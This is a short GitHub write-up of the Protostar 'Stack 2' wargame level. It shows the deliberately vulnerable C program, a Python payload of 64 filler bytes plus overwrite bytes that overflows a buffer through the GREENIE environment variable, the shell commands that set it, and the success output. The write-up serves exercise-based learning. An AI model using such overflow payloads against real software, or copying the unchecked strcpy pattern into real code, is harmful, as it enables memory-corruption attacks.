hacking-writeups

View the Project on GitHub HarishgunaS/hacking-writeups

Stack 2

Stack 2 source

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

This program requires editing the environment variable GREENIE which is used as input. Thus, writing an oversized value into GREENIE causes a buffer overflow. However, the special variable meant to overwrite modified cannot be copy pasted, which makes things a little interesting.

stack2.py

print("A"*64+"\x0a\x0d\x0a\x0d")

Shell commands

python stack2.py > exploit
GREENIE=$(cat exploit)
export GREENIE
./stack2

Output

you have correctly modified the variable